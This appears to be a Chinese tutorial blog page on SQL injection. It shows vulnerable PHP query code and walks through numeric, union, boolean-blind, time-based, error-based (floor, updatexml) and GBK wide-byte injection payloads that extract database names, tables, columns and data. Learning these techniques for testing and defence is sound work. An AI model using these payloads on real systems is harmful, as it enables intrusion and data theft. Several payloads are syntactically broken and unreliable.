2. 程式人生 > 實用技巧 >sql注入(一)

sql注入(一)

阿新 發佈:2020-11-29

一.sql諸注入分類

1.數字型注入

$id =$_GET['id'];
$sql= "SELECT * FROM users  WHERE id = $id  LIMIT 0,1";
$result = mysql_query($sql);
$row = mysql_fetch($result);

判斷方法:

1>輸入單引號,不正常返回。

2>輸入and 1=1,正常返回。

3>輸入 and 1=2 ,不正常返回。

2.字元型注入

$id =$_GET['id'];
$sql= "SELECT * FROM users  WHERE id = '$id' LIMIT 0,1";

 
$result = mysql_query($sql);
$row = mysql_fetch($result);

判斷方法:

1>輸入單引號,不正常返回。

2>輸入and ’1’=’1,正常返回。

3>輸入 and ‘1’=‘2 ,不正常返回。

注意:根據頁面返回情況靈活判斷,不要生搬硬套。

二.mysql注入

information_schema資料庫儲存了schema表,tables表和columns表等等,提供了訪問資料庫元資料的方式。

paloads:

1>判斷注入點

id =1 and 1=1

2>order by 判斷欄位數

對於order by 沒有用的網頁,可用union select 1……逐步測試至頁面返回正常

id =1 and 1=2 order by 3    /*用欄位所在的列表中的位置號代替欄位名*/

3>判斷報錯點(能在頁面上顯示出來的)

id =1 and 1=2 union select 1,2,3

4.獲取當前資料庫名

id =1 and 1=2 union select 1,group_concat(user(),database()),3

5>獲取表名

id =1 and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema =
 
'資料庫名'

6>獲取欄位名

id =1 and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_name ='表名'

7>獲取列中的資料

id =1 and 1=2 union select 1,欄位名,3 from 表名

*在查詢中常會新增and 1=2,否則經過聯合查詢後會返回多行資料,沒法判斷是哪一列在前端顯示的資料

盲注

1.bool注入

無任何資訊輸出,只有正確和不正確兩種狀態

payload:

1>獲取資料庫長度

id =1 and (select length(database() ))>8

2>獲取資料庫名

id=1 and (select ascii(substring(database(),1,1) ) )>99

3>獲取當前資料庫表名

id=1 and  ascii(substring(select table_name from information_schema.tables where table_schema =‘資料庫名’ limit 0,1),1,1) )>99

2.sleep注入(延時)

無任何報錯資訊,頁面不管對錯都是一種狀態。

payload

1>判斷當前資料庫的長度

id =1 and sleep(if(length ( (select database()) )=10,5,0 ))

2>獲取資料庫名

id=1 and sleep(if( ascii(substring(database(),1,1))<116, 5, 0))

3>獲取當前資料庫表名

id=1 and  sleep(if(ascii(substring(select table_name from information_schema.tables where table_schema =‘資料庫名’ limit 0,1),1,1) )>99,5,0)   

利用函式報錯注入

1.floor注入

rand 函式與group by子句一起使用時,rand函式會計算多次,導致報錯產生的注入

floor() 向下取整數
0<rand()<1
0< rand()*2 <2
floor(rand(0)*2)) 0或1
x 和 a 都是括號裡的別名啦,為了少寫

payload

1>獲取當前資料庫名稱

id=1 and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)

2>獲取當前資料庫表名稱

id =1 and (select 1 from (select count(*), concat((select (table_name) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

3>獲取當前資料庫欄位名

id =1 and (select 1 from (select count(*), concat((select (column_name) from information_schema.columns where table_schema.tables='表名' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

4>獲取資料

id =1 and (select 1 from (select count(*), concat((select 欄位名 from 表名 limit 0,1),0x3a,floor((rand(0)*2))x  from information_schema.tables group by x)a)

2.updatexml注入

利用updatexml函式第二個引數XPath_string(XML的文件路徑)的報錯進行注入,格式不正確會報錯。

updatexml(XML_doucument,XPath_string,new_value)

payload

1>檢視資料庫名稱

id =1 and updatexml(1,concat(0x7e,(database())),0)

2>檢視所有表的資訊

id =1 and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='資料庫名' limit 0,1)),0)

3>檢視所有欄位

id =1 and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='資料庫名'and  table_name ='表名' limit 0,1)),0)

4>檢視列的值

id =1 and updatexml(1,concat(select 欄位名 from 表名 limit 0,1),0)

3.extractvalue函式 

寬位元組注入

開發者將使用者輸入的資料用addlashes等函式進行過濾,預設對單引號等字元進行轉義,可以避免注入。但是mysql在使用GBK編碼時,如果第一個字元的ASCII碼大於128(url編碼大於%80),會認為前兩個字元是一個漢字,會將後面轉義字元吃掉,將前兩個字元拼接成為一個漢字,這樣既可以將SQL語句閉合,造成寬位元組注入。

payload

1>檢視資料庫名稱

id =1%81' and 1=2 union select 1,database(),3

用ascii編碼為129字元進行注入,其url編碼為%81,由於使用的是GBK編碼,%81把後面的轉義字元 \ (url編碼為%5) 吃掉,組成了一個漢字,前面的單引號得以閉合。

相關推薦

sql注入()

.sql注入分類 1.數字型注入 $id =$_GET[\'id\']; $sql= \"SELECT * FROM usersWHERE id = $idLIMIT 0,1\";

淺談次與sql注入 & webshell 的美麗“邂逅”

引言 波未平,一波又起。金融公司的業務實在是太引人耳目,何況我們公司的業處正處於風口之上(區塊鏈金融),並且每天有大量現金交易,所以不知道有多少躲在暗處一直在盯著你的系統,讓你防不勝防,並且想方設法的

SQL注入原理及程式碼分析()

前言 我們都知道,學安全,懂SQL注入是重中之重,因為即使是現在SQL注入漏洞依然存在,只是相對於之前現在挖SQL注入變的困難了。而且知識點比較多,所以在這裡總結一下。通過構造有缺陷的程式碼,來理解常見的幾種SQ

專屬SRC - Sql注入 - Bypass 長亭Waf

Bypass手法就是不發, 要是很熟的鐵子 想要報告可以找我 我發你。不認識的鐵子 咱也可以認識哈哈

[Web安全]SQL注入總結()基礎篇

[Web安全]SQL注入總結()基礎篇 搞不懂17周了,居然還有很多課要上,sql注入有點多,所以分開來寫,先水

SQL注入

sql注入介紹 我們直接來看一個例子: 我們訪問的站點目錄是Less-1,傳入引數id=1

這是SQL注入文章

目錄注入原理:1、尋找注入點的方式或注入的地方可能包括。2、注入點判斷方法。3、注入分類。數字型:字元型:搜尋型:XX型(也叫其他型):4、注入提交方式。5、注入攻擊型別與方式。union注入:information_sche

次DVWA下的SQL注入測試

技術標籤:Web 漏洞解析sql安全漏洞mysql安全 文章目錄 、前言二、Low級別的測三、Medium級別的測試

request請求的body中的引數(json物件)只能取出次,引數丟失問題的解決方式(防sql注入過濾器的應用)

在專案即將上線的滲透測試報告中檢測出了sql注入的問題,關於這個問題的解決方案,最初的思路是寫一個全域性的過濾器,對所有請求的引數進行過濾攔截,如果存在和sql注入相關的特殊字元則攔截掉,具體細節展開以下

滲透學習筆記(三)--SQL注入學習(

@目錄sql注入常見攻擊思路常見流程 使用靶場為sqli靶場 例題為GET - Error based - Single quotes - String(基於錯誤的GET單引號字元型注入)

次苦逼的SQL注入

0x01: 偶打點,看到一個可愛的系統…. 1.通過F12 把連結提出來仔細瞅瞅… 2.看見id,果斷測注入

SQL注入手法和思路(

MYSQL聯合查詢注入 MYSQL資料庫知識 在MYSQL5.0以上版本中,MYSQL存在一個自帶資料庫名為information_schema,它是一個儲存記錄有所有資料庫名,表名,列名的資料庫,也相當於可以通過查詢它獲取指定資料庫下面的

SQLiv:款批量SQL注入漏洞掃描工具

今天給大家介紹款名叫SQLiv的批量SQL注入漏洞掃描工具。 功能介紹 批量域名掃描SQL注入漏洞;

sql注入原理及防範

前言         sql注入種危險係數較高的攻擊方式,現在由於我們持久層框架越來越多,大部分框架會處理這個問題,因此導致我們對它的關注度越來越少了。最近部門在整理安全漏洞時,提到了一些關於sql注入的修改

詳解SQL注入--安全(二)

如果此文章有什麼錯誤,或者您有什麼建議,歡迎隨時聯絡我,謝謝! 寫在前面:在前兩天初學SQL注入的基礎上,繼續在Metasploitable-Linux環境下進行練習。

關於sql注入的簡要演示(入坑拋磚)

首先可能大家都會問什麼是sql? Sql是資料庫的種型別,是用來儲存網站資料的。

pymysql如何解決sql注入問題深入講解

1. SQL 注入 SQL 注入是非常常見的種網路攻擊方式,主要是通過引數來讓 mysql 執行 sql 語句時進行預期之外的操作。

使用PDO防sql注入的原理分析

前言 本文使用pdo的預處理方式可以避免sql注入。下面話不多說了,來一起看看詳細的介紹吧

SQL注入的2個小Trick及示例總結

前言 最近發現了兩個關於sql注入的小trick,分享一下.下面話不多說了,來一起看看詳細的介紹吧

SQL注入技巧之顯注與盲注中過濾逗號繞過詳析

前言 sql注入在很早很早以前是很常見的一個漏洞。後來隨著安全水平的提高,sql注入已經很少能夠看到了。但是就在今天,還有很多網站帶著sql注入漏洞在執行。下面這篇文章主要介紹了關於SQL注入逗號繞過的相關內容,分